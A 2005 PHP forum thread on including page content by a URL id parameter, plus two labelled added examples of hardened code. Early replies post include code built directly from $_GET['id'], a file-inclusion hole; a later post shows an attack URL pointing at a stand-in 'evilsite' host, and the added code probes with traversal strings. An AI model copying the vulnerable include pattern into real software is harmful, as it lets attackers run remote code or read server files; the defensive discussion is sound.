Loading files by ID

Using includes

hexdj

3:31 am on Sep 16, 2005 (gmt 0)

I have noticed that some sites load "whatever.com?id=11", for example. I wonder if the file with id 11 loads with the rest of the contents of the site (including nav bar, footer, header, etc.); if so, how can I give IDs to my files?

I want to have a plain old HTML file with the contents that I will load when I use something like <?php include("file_id.php4"); ?>. Basically what I would like to know is how to pass the value of the id given in the address bar to an include statement in PHP. Hope you guys get the idea.

Thanks in advance.

badone

5:33 am on Sep 16, 2005 (gmt 0)

<?php

$id = $_GET['id'];
include('file_id.php' . $id);

?>

hexdj

5:46 am on Sep 16, 2005 (gmt 0)

Thanks badone, would you mind elaborating a little on how this all works?

grandpa

5:59 am on Sep 16, 2005 (gmt 0)

It sounds like you understand the first part of the process, which is to pass a value when you call the page. For example, mypage?parm=52.

What happens after that? First of all, you won't be able to do this with a plain old HTML document. You'll need to make it a php document. Then, using the example above you use the $_GET variable to retrieve the passed value and take whatever action you want based on that value. So your new php document will have something like this, usually near the top of the code.

<?php
$id = $_GET['id'];
$include_file = $id . '.php';
?>
Regular html stuff
Time to display the included content for that page.
<?php include($include_file); ?>
More regular html stuff.

Hope that helps.

hexdj

6:07 am on Sep 16, 2005 (gmt 0)

Is there any risk of getting hacked using the above method?

grandpa

6:21 am on Sep 16, 2005 (gmt 0)

Yes, there is always a risk when you are passing parameters (using GET or POST methods). But that risk can be eliminated/minimized with a few simple procedures. One way would be to create a whitelist, a list of known good parameters. If something is passed that isn't in the list, you take a default action. For what you're doing that's probably not the best method since you have to maintain the list for every page you want to include.

You should always validate and clean input to your scripts. Some useful hints can be found in our own library at PHP Security [webmasterworld.com].

hexdj

6:35 am on Sep 16, 2005 (gmt 0)

Would a SWITCH structure be helpful for that matter, instead of passing the values directly?

grandpa

2:51 pm on Sep 16, 2005 (gmt 0)

That I cannot answer. I just pass parameters and take the necessary precautions.

hexdj

4:06 pm on Sep 16, 2005 (gmt 0)

Can you name one of the precautions that you take, please?

jatar_k

4:13 pm on Sep 16, 2005 (gmt 0)

If you are using numeric ids, make sure they are numeric before you do anything with them.

Properly handle the scenario where a number passed does not correspond to a valid row.

vdoyl

9:13 pm on Sep 16, 2005 (gmt 0)

> is there any risk of getting hacked using the above method?

$id = $_GET['id'];
$include_file = $id . '.php';

That one is extremely vulnerable, especially if you have url_fopen wrappers enabled.

Just an example:

mypage.php?id=http://evilsite.com/hacktool

$id = $_GET['id'];
$include_file = $id . '.php';

The code will include the hacktool script and can cause a lot of trouble :)

Always validate the user input.

If you expect the ID to be an integer, do a simple check like is_numeric($id).

Another option would be to make some switch() construction.

switch ($id) {
    case "1":
        include('file1.php');
        break;
    case "2":
        include('file2.php');
        break;
    default:
        include('defaultfile.php');
        break;
}
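Added example (not posted by anyone in this thread): the vulnerable pattern from the posts above beside a hardened version of the numeric-id approach. The directory layout, the page_N.php naming, the evilsite.example placeholder and the 9-digit length cap are all assumptions made for this example; the script builds its own temporary content directory so it can be run from the command line as-is, and the probe loop shows why ctype_digit() is a tighter check than is_numeric() for this job.

```php
<?php
declare(strict_types=1);

// VULNERABLE (the pattern discussed above): whatever arrives in ?id= becomes
// the include path. With allow_url_include enabled the attacker's own script
// is fetched and executed; without it, any readable .php file on the box can
// still be pulled in through ../ traversal. Shown for contrast, never called.
function load_page_unsafe(string $id): void
{
    include $id . '.php';
}

// HARDENED: the id is only ever used as a number, the directory is fixed in
// code, and anything unexpected falls through to a default page.
function resolve_page(string $id, string $contentDir): string
{
    $default = $contentDir . DIRECTORY_SEPARATOR . 'default.php';
    // ctype_digit() accepts ASCII digits only. is_numeric() also accepts
    // "1e3", " 1", ".5" and "-1", so it is the weaker check here.
    // The length cap (an assumed limit) keeps the value inside int range.
    if (!ctype_digit($id) || strlen($id) > 9) {
        return $default;
    }
    // The (int) cast canonicalises leading zeros: "01" and "1" map to the same file.
    $candidate = $contentDir . DIRECTORY_SEPARATOR . 'page_' . (int) $id . '.php';
    // A number that matches no page (the "no valid row" case) gets the default too.
    return is_file($candidate) ? $candidate : $default;
}

// --- constructed demo content: a temporary directory, removed at the end ---
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'page_demo_' . getmypid();
mkdir($dir, 0700);
file_put_contents($dir . '/page_1.php', "<p>Page one</p>\n");
file_put_contents($dir . '/default.php', "<p>Default page</p>\n");

$probes = ['1', '01', '2', '1e3', ' 1', '../../etc/passwd', 'http://evilsite.example/hacktool', ''];
printf("%-36s %-11s %s\n", 'id', 'is_numeric', 'resolved to');
foreach ($probes as $probe) {
    printf("%-36s %-11s %s\n", var_export($probe, true),
        is_numeric($probe) ? 'true' : 'false',
        basename(resolve_page($probe, $dir)));
}

// How the page itself would use it: include the resolved file, never the raw id.
// ($argv is read so the script also works from the command line.)
$id = $_GET['id'] ?? ($argv[1] ?? '');
echo "\n";
include resolve_page($id, $dir);

unlink($dir . '/page_1.php');
unlink($dir . '/default.php');
rmdir($dir);
```

Run it as `php example.php 1` and then with `php example.php 1e3`: is_numeric() says true for both, but only the first resolves to page_1.php; everything else, including the URL and the traversal string, lands on default.php without the id ever touching include().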

hexdj

3:16 am on Sep 17, 2005 (gmt 0)

Thanks vdoyl, this is really helpful since I am a complete newbie in the php world.

I think I am going to go with the is_numeric($id) option...

Would it be also a good idea to check if the file exists on my server (not sure how to do that) before doing anything?

Thanks again

jatar_k

6:45 am on Sep 18, 2005 (gmt 0)

Yes, that's a good idea.

Try this:
[php.net...]

hexdj

11:22 pm on Sep 18, 2005 (gmt 0)

Thanks Jakar

I was looking into php.net and it's been helpful; wouldn't it be a better idea to use file_exists instead?

jatar_k

3:39 pm on Sep 19, 2005 (gmt 0)

That works too, I don't know if one is better.

hexdj

4:39 am on Sep 20, 2005 (gmt 0)

Is there actually a function called is_numeric?

coopster

1:12 pm on Sep 20, 2005 (gmt 0)

I would go with is_file() [php.net] as that tells whether the filename is a regular file. file_exists() [php.net] merely checks whether a file or directory exists.

The PHP manual pages have a search tool where you can search for any function. It is near the upper right of the page. Yes, is_numeric() [php.net] is a function.
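Added example (not from anyone in this thread): what the file_exists() / is_file() question above, and grandpa's earlier whitelist suggestion, look like when the check has to be safe rather than just present. It assumes pages are named by a slug rather than a number, a content directory fixed in code, and a constructed layout with a page, a directory carrying a .php name, a symlink and a file outside the content directory; the script builds that layout in a temporary directory so it runs from the command line and prints what each check says about each name.

```php
<?php
declare(strict_types=1);

// Resolve a user-supplied page name to a regular file inside $contentDir.
// Returns the canonical path, or null when the name must not be included.
function safe_include_path(string $name, string $contentDir): ?string
{
    $base = realpath($contentDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    // 1. Syntactic whitelist: plain slugs only, so "../" and "/" never reach
    //    the filesystem at all. (Pattern and length are assumptions.)
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    // 2. Canonicalise: realpath() resolves ".." and symlinks and returns
    //    false when the target does not exist.
    $real = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    if ($real === false) {
        return null;
    }
    // 3. Containment: the resolved path must still lie inside the content
    //    directory. A symlink dropped there could otherwise point anywhere.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // 4. Regular file only: is_file() is false for a directory, which
    //    file_exists() would happily accept.
    return is_file($real) ? $real : null;
}

// --- constructed demo layout: a temporary directory, removed at the end ---
$root    = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
$content = $root . DIRECTORY_SEPARATOR . 'content';
mkdir($content, 0700, true);
file_put_contents($content . '/about.php', "<p>About us</p>\n");
file_put_contents($root . '/secret.php', "<?php \$db_password = 'hunter2';\n"); // outside the content dir
mkdir($content . '/admin.php');                             // a directory with a .php name
@symlink($root . '/secret.php', $content . '/leak.php');   // symlink escaping the content dir

printf("%-12s %-12s %-8s %s\n", 'name', 'file_exists', 'is_file', 'safe_include_path');
foreach (['about', 'missing', 'admin', 'leak', '../secret'] as $name) {
    $naive = $content . '/' . $name . '.php'; // what the unchecked code would include
    printf("%-12s %-12s %-8s %s\n", $name,
        file_exists($naive) ? 'true' : 'false',
        is_file($naive) ? 'true' : 'false',
        safe_include_path($name, $content) ?? 'null');
}

// Cleanup
@unlink($content . '/leak.php');
rmdir($content . '/admin.php');
unlink($content . '/about.php');
unlink($root . '/secret.php');
rmdir($content);
rmdir($root);
```

The rows for `leak` and `../secret` are the ones to look at: both file_exists() and is_file() answer true for them, because the file really does exist, yet neither belongs in an include. An existence check only tells you the include will not warn; it is the slug whitelist plus the realpath() containment check that decides whether the file is one of yours.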